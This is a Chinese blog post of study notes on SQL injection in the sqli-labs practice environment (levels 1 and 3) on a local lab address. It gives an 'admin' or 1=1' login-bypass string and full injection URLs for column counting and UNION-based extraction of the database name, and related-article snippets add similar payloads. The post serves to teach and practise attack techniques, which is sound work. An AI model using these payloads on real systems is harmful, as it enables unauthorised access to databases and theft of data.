SQL-lab 1-4关

最新推荐文章于 2023-01-08 08:26:47 发布
最新推荐文章于 2023-01-08 08:26:47 发布
阅读量3.7k 收藏
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yueshangttt/article/details/124061008
版权

SQL注入原理

语言分类

1.解释型语言

2.编译型语言

解释型语言,若程序与用户进行交互时。用户就可以构造特殊的输入来拼接到程序中执行,从而使得程序依据用户输入执行有可能存在恶意行为的代码。

万能密码(绕过用户名和密码)

用户名:admin'or1=1-- (单行注释后必须有空格)

密码:随意就可以

cms逻辑:index.php首页展示内容,具有文章列表(l链接具有文章id ),articles.php文章详细页,URL中article.php?id=文章id读取文章id

sql注入验证:

1.单引号‘

2.and1=1

3.and1=2

如果页面中Mysql报错,证明该页面存在SQL注入漏洞

靶场地址 http://192.168.100.128/sql-lab/

第一关靶场

Less-1

http://192.168.100.128/sql-lab/Less-1/

判断是否被当做代码执行 http://192.168.100.128/sql-lab/Less-1/?id=1%20and%201=2 (and1=1)

尝试一下闭合

http://192.168.100.128/sql-lab/Less-1/?id=1%20%27and%201=1%20--%20q 没问题

http://192.168.100.128/sql-lab/Less-1/?id=1%20%27and%201=2%20--%20q 有问题 页面异常 说明之间存在SQL注入

接下来找当前的字段数

http://192.168.100.128/sql-lab/Less-1/?id=1%20%27order%20by%201%20--%20q order by 1正常

Order by 1 2 3均正常

http://192.168.100.128/sql-lab/Less-1/?id=1%20%27order%20by%204%20--%20q order by 4 异常

说明存在三个字段

接下来判断显错位,使用联合查询

http://192.168.100.128/sql-lab/Less-1/?id=1%20%27union%20select%201,2,3%20--%20q 依然没有问题 是因为查询结果显示在了前面,所以没有显示联合查询的结果

现在将前面的id更换为100,100处没有前面的结果,所以将显示联合查询的结果

http://192.168.100.128/sql-lab/Less-1/?id=100%20%27union%20select%2011,22,33%20--%20q 这样显示22和33,22和33是(显错位)的意思

http://192.168.100.128/sql-lab/Less-1/?id=100%20%27union%20select%2011,database(),33%20--%20q

显示 Security(当前数据库的库名)用database()来获取库名

来自 <http://192.168.100.128/sql-lab/Less-1/?id=100%20%27union%20select%2011,database(),33%20--%20q>

table_name查询表名

建议用 一个一个查,尽量不用 group_concat 函数 因为显示位数不够可能导致无法显示完整

第三关靶场

http://192.168.100.128/sql-lab/Less-3/?id=1%27)%20and%201=2%20--%20q

实战中多尝试闭合 ‘) “)1=1 1=2 组合尝试

其他操作大致相同

 

yuedarkshadow
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLI-labs-第四
weixin_54055099的博客
09-04 658
SQLI第四的思路跟步骤
sqli-labs第四
TA不懒,但还没有添加简介
09-08 447
sqli-labs第四 第四根据提示知道是基于双引号的错误,于是通过注入判断发现还有类似第三的问题 构造一下sql语句 select 1,2,3 from table where id=("$id") 所以需要在1’后面增加一个") 然后使用order by 或者select 判断字段个数 然后和第一、第二一样的办法获得表、字段、数据 第一二详细 第三 总结 找到合适的注入点,通过反馈信息构造语句。 ...
sqllab第四解析
Deeeelete的博客
12-09 417
按照以往经验,它们估计永远在第四个字段上报错,所以直接查字段,而且它们也必定报错 什么也没有,说明后面的语句没读取,用-1’”试试 后面出现了),所以我们知道要加),但后方也出现了”,而且奇怪的是我们之前写在order by 前面的”没了,那肯定是跟前面的某个”给闭合了,为了进一步确定,再查看一下。 它提示前面已经有了一个”,所以我们的确闭合了它,因此保留这里的”并加) 然后就是以...
sqli-labs靶场第四
gou1791241251的博客
12-19 1249
传入参数单引号页面显示正常,传入双引号时页面报错显示异常 第一步:判断注入类型,字符型还是数字型 由报错信息可知注入类型为双引号字符型。闭合方式是) and 1=1 --+时页面正常,and 1=2 --+时页面异常。说明闭合方式猜对了 ") 此时可以通过order by 来判断当前数据库表有多少个字段了 order by 3显示正常,order by 4显示异常,说明有三个字段。 可以通过union查询,查看页面回显位置 同样老套路查询一下当前数据库和当前版本号 通过information..
暑期练习web21:sqli lab赛1-4
qq_41618162的博客
08-23 374
经学长推荐准备刷一刷sqli lab这个闯赛,提高一波 第一 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 首先我们输入?id=1‘测试一下,于是就提示这里是有漏洞的,而且是一个字符型注入,最后面的limit 0,1要注意了,每次只显示一行 接着用order by测试字段数,直到3还是正常的,所以有三...
SQL-Lab:包含用于从头开始设置SQL Server Lab Environment的脚本
03-21
在IT领域,数据库管理是至重要的,而SQL Server作为一款广泛应用的系型数据库管理系统,其学习和实践环境的搭建对于开发者和管理员来说至重要。"SQL-Lab"项目提供了一种便捷的方式来构建一个专用于SQL Server...
IAP-Lab:Internet应用程序编程实验室
02-12
4. **数据库交互**:使用PHP连接MySQL数据库,执行SQL查询,插入、更新和删除数据,以及预处理语句以防止SQL注入攻击。 5. **错误和异常处理**:了解如何在代码中处理错误和异常,确保程序的健壮性。 6. **会话管理*...
CP-Lab-3
02-19
1. 类与对象:C#中的所有程序都始于类,它是创建对象的蓝图。类定义了对象的属性(数据成员)和行为(方法)。通过实例化类,我们可以创建对象,并通过对象来操作数据和执行方法。 2. 控制结构:包括条件语句(如if...
web-lab
03-18
需要熟悉SQL查询语言,包括CRUD操作(Create、Read、Update、Delete),以及预处理语句以防止SQL注入攻击。 4. **Web服务器配置**:项目可能涉及到Apache或Nginx等Web服务器的配置,包括设置虚拟主机、重定向规则和...
sql_lab_第5 Python源码SQL注入
04-25
SQLI-LAB是专门练习SQL注入的实验环境,最新有69道题涵盖了SQL注入的所有分类,相下载链接:https://github.com/Audi-1/sqli-labs
sqli-labs 基础篇1~4 详细通解析
Lucky小小吴的小屋
01-08 689
在这里,就直接看到答案了,主要是因为他的源码构成的,当输入id=1时,会输出一个数据,恰好我们需要的账号和密码就是第一条数据,不过我们要按照顺序,慢慢爆。id=1’ ”,报错’ 1’ ') LIMIT 0,1 ,根据我们注入的sql语句,可以判断出源码存在括号。根据《Web安全深度剖析》上,讲到sql数字型注入存在验证方式,大致分为三步,满足三句话,即可能存在sql注入。id=1‘ ”,发现报错 ’ LIMIT 0,1。上述分析,我们注入时,不加分号,故接下来的数据库结构判断的sql注入语句是……
sqli-lab题解及经验总结一
一枚努力的蛋蛋
07-09 876
sqli-lab题解及经验总结1.基于错误的单引号,字符型2.基于错误的整型3.基于错误的'),字符型4.基于错误的),字符型5.报错,单引号,字符型6.报错,双引号,字符型7.写出文件型,一句话8.布尔盲注,单引号 1.基于错误的单引号,字符型 http://www.sql.com/Less-1/?id=1 http://www.sql.com/Less-1/?id=2-1 说明了是字符类型...
sqli-labs Lesson-4详细过程
Brad_的博客
10-17 493
OneNote粘贴为图片,最好自己动手试一下。
sqli-labs—————Less-4
Fly_鹏程万里
05-08 659
Less4根据要求传入参数id,数据类型numeric添加单引号、and 1=1  、and 1=2进行测试感觉是不是非常奇怪,为什么都是正确显示页面呢?我们不妨再试试双引号注入代码之后,我们得到了下面这个错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ve...
史上最详细的sql-labs通秘籍less1-4
weixin_50644728的博客
11-24 791
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库。
SQL lab 前二十答案
m0_61990875的博客
10-21 174
SQL lab
sqllab 1-6 练习
wxh的博客
11-05 2695
前言 什么是sql注入? 攻击者通过构造不同的sql语句来实现对数据库的操作 两个键 :参数用户可控 参数带入数据库查询 基本流程 判断注入点 判断字段数 判断回显点 查询相内容 判断库名----> 判断表明---->判断列名----->判断数据 搭建 复制文件到 D:\phpstudy_pro\WWW 创建网站 设置根目录为该文件 注意 php版本需要为 5.4.45 至此 搭建完成 less-1 GET - Error based - Sin...
sqli-labs系列——第四
1匹黑马
04-26 3796
文章目录判断注入开始注入 判断注入 第四过滤了 ’ 但是没有过滤 " ,这个题跟第三题一样,之不过第三题过滤了 " 第四题过滤了 ’ 罢了。 看一下对比: 第三 第四 也就是说,第四sql语句是这样的: select * from user where id=("$id"); 那么exp也很好写了: -1") union SELECT 1,2,(select group_conca...
sqllab 第一
aliexiansheng的博客
10-22 504
一、正常访问 判断是否存在注入 http://127.0.0.1/sqllab/Less-1/?id=1' 标白部分为实际的报错内容,可以看出因为写入的’拼接到语句中造成原语句的单引号多余,导致报错。 通过添加的 – + 注释掉后续查询语句,达到语句正常执行的目的 二、猜解当前数据库列数以及页面中的显示位置 http://127.0.0.1/sqllab/Less-1/?id=1'order by 1 --+ http://127.0.0.1/sqllab/Less-1/?id=1'order by 2
sql-lab第46
最新发布
07-28
对不起,我无法回答sql-lab第46的问题。 #### 引用[.reference_title] - *1* *2* *3* [sql-lab(ALL 1-65)](https://blog.csdn.net/lee_maple/article/details/123363445)[target="_blank" data-report-click={...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值